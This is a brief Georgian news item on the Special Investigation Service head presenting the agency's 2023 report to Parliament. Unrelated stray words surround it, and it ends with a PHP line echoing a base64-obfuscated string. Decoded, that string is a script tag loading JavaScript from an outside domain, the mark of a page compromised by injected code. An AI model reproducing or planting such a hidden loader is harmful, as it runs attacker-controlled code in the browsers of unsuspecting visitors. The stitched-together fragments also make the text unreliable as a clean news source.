celsiusi
ავერსი შნაიდერი

სპეციალური საგამოძიებო სამსახურის უფროსმა, კოკა კაციტაძემ საქართველოს პარლამენტს სპეციალური საგამოძიებო სამსახურის მიერ 2023 წელს განხორციელებული საქმიანობის შესახებ ანგარიში წარუდგინა.

ანგარიშში წარმოდგენილია ინფორმაცია 2023 წელს უწყების მიერ განხორციელებული ღონისძიებების, ინსტიტუციური და ორგანიზაციული რეფორმების, მიღწეული შედეგების, სამსახურის ქვემდებარეობას მიკუთვნებული სხვადასხვა კატეგორიის დანაშაულებთან დაკავშირებული სტატისტიკური ინფორმაციის, სამსახურის წინაშე არსებული გამოწვევებისა და სამომავლო გეგმების შესახებ.

ანგარიში ასევე მოიცავს ინფორმაციას, გამოძიების პროცესში გამოვლენილი ტენდენციების გათვალისწინებით, სამართალდამცავთა მიმართ კონკრეტულ რეკომენდაციებთან დაკავშირებით, რომელთა შესრულებაც ქვეყანაში ადამიანის უფლებრივ მდგომარეობას საგრძნობლად გააუმჯობესებს.

ანგარიში, კანონით განსაზღვრული მოთხოვნების შესაბამისად, არ შეიცავს ინფორმაციას კონკრეტული სისხლის სამართლის საქმის გამოძიებასთან ან/და სისხლის სამართლის საქმის ცალკეულ გარემოებებთან დაკავშირებული საკითხების შესახებ.

159
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");